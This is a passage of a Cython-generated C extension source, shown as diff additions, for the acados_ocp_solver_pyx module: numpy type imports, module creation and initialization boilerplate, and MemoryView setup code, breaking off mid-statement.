__pyx_ptype_5numpy_number = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "number", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_number) __PYX_ERR(2, 814, __pyx_L1_error) + __pyx_ptype_5numpy_integer = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "integer", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_integer) __PYX_ERR(2, 816, __pyx_L1_error) + __pyx_ptype_5numpy_signedinteger = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "signedinteger", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_signedinteger) __PYX_ERR(2, 818, __pyx_L1_error) + __pyx_ptype_5numpy_unsignedinteger = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "unsignedinteger", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_unsignedinteger) __PYX_ERR(2, 820, __pyx_L1_error) + __pyx_ptype_5numpy_inexact = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "inexact", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_inexact) __PYX_ERR(2, 822, __pyx_L1_error) + __pyx_ptype_5numpy_floating = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "floating", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_floating) __PYX_ERR(2, 824, __pyx_L1_error) + __pyx_ptype_5numpy_complexfloating = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "complexfloating", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_complexfloating) __PYX_ERR(2, 826, __pyx_L1_error) + __pyx_ptype_5numpy_flexible = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "flexible", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_flexible) __PYX_ERR(2, 828, __pyx_L1_error) + __pyx_ptype_5numpy_character = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "character", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_character) __PYX_ERR(2, 830, __pyx_L1_error) + __pyx_ptype_5numpy_ufunc = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "ufunc", sizeof(PyUFuncObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyUFuncObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_ufunc) __PYX_ERR(2, 868, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_acados_ocp_solver_pyx(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, (void*)__pyx_pymod_exec_acados_ocp_solver_pyx}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "acados_ocp_solver_pyx", + 0, /* m_doc */ + #if CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC initacados_ocp_solver_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC initacados_ocp_solver_pyx(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_acados_ocp_solver_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_acados_ocp_solver_pyx(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_acados_ocp_solver_pyx(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + static PyThread_type_lock __pyx_t_8[8]; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'acados_ocp_solver_pyx' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("acados_ocp_solver_pyx", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to acados_ocp_solver_pyx pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_acados_ocp_solver_pyx(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_acados_template__acados_ocp_solver_pyx) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name_2, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "acados_template.acados_ocp_solver_pyx")) { + if (unlikely((PyDict_SetItemString(modules, "acados_template.acados_ocp_solver_pyx", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + if (unlikely((__Pyx_modinit_type_import_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code ---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__30, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_version_info); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = PyObject_RichCompare(__pyx_t_5, __pyx_tuple__31, Py_GE); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (__pyx_t_6) { + + /* "View.MemoryView":101 + * try: + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence # <<<<<<<<<<<<<< + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + */ + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__32, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 101, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_abc); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 101, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_Sequence); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 101, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + goto __pyx_L8; + } + + /* "View.MemoryView":103 + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence # <<<<<<<<<<<<<< + * except: + * + */ + /*else*/ { + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__33, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 103, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_Sequence); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 103, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_5); + __pyx_t_5 = 0; + } + __pyx_L8:; + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L7_try_end; + __pyx_L2_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "View.MemoryView":104 + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + * except: # <<<<<<<<<<<<<< + * + * __pyx_collections_abc_Sequence = None + */ + /*except:*/ { + __Pyx_AddTraceback("View.MemoryView", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_4, &__pyx_t_7) < 0) __PYX_ERR(1, 104, __pyx_L4_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_4); + __Pyx_XGOTREF(__pyx_t_7); + + /* "View.MemoryView":106 + * except: + * + * __pyx_collections_abc_Sequence = None # <<<<<<<<<<<<<< + * + * + */ + __Pyx_INCREF(Py_None); + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, Py_None); + __Pyx_GIVEREF(Py_None); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + goto __pyx_L3_exception_handled; + } + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + __pyx_L4_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L3_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + __pyx_L7_try_end:; + } + + /* "View.MemoryView":241 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_3, &__pyx_t_2, &__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_1); + /*try:*/ { + + /* "View.MemoryView":242 + * + * try: + * count = __pyx_collections_abc_Sequence.count # <<<<<<<<<<<<<< + * index = __pyx_collections_abc_Sequence.index + * except: + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_count); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 242, __pyx_L11_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_array_type->tp_dict, __pyx_n_s_count, __pyx_t_7) < 0) __PYX_ERR(1, 242, __pyx_L11_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_array_type); + + /* "View.MemoryView":243 + * try: + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index # <<<<<<<<<<<<<< + * except: + * pass + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_index); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 243, __pyx_L11_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_array_type->tp_dict, __pyx_n_s_index, __pyx_t_7) < 0) __PYX_ERR(1, 243, __pyx_L11_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_array_type); + + /* "View.MemoryView":241 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L16_try_end; + __pyx_L11_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":244 + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + * except: # <<<<<<<<<<<<<< + * pass + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L12_exception_handled; + } + __pyx_L12_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_2, __pyx_t_1); + __pyx_L16_try_end:; + } + + /* "View.MemoryView":309 + * return self.name + * + * cdef generic = Enum("") # <<<<<<<<<<<<<< + * cdef strided = Enum("") # default + * cdef indirect = Enum("") + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__34, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 309, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(generic); + __Pyx_DECREF_SET(generic, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":310 + * + * cdef generic = Enum("") + * cdef strided = Enum("") # default # <<<<<<<<<<<<<< + * cdef indirect = Enum("") + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__35, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 310, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(strided); + __Pyx_DECREF_SET(strided, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":311 + * cdef generic = Enum("") + * cdef strided = Enum("") # default + * cdef indirect = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__36, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 311, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(indirect); + __Pyx_DECREF_SET(indirect, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":314 + * + * + * cdef contiguous = Enum("") # <<<<<<<<<<<<<< + * cdef indirect_contiguous = Enum("") + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__37, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(contiguous); + __Pyx_DECREF_SET(contiguous, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":315 + * + * cdef contiguous = Enum("") + * cdef indirect_contiguous = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__38, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(indirect_contiguous); + __Pyx_DECREF_SET(indirect_contiguous, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":323 + * + * + * cdef int __pyx_memoryview_thread_locks_used = 0 # <<<<<<<<<<<<<< + * cdef PyThread_type_lock[8] __pyx_memoryview_thread_locks = [ + * PyThread_allocate_lock(), + */ + __pyx_memoryview_thread_locks_used = 0; + + /* "View.MemoryView":324 + * + * cdef int __pyx_memoryview_thread_locks_used = 0 + * cdef PyThread_type_lock[8] __pyx_memoryview_thread_locks = [ # <<<<<<<<<<<<<< + * 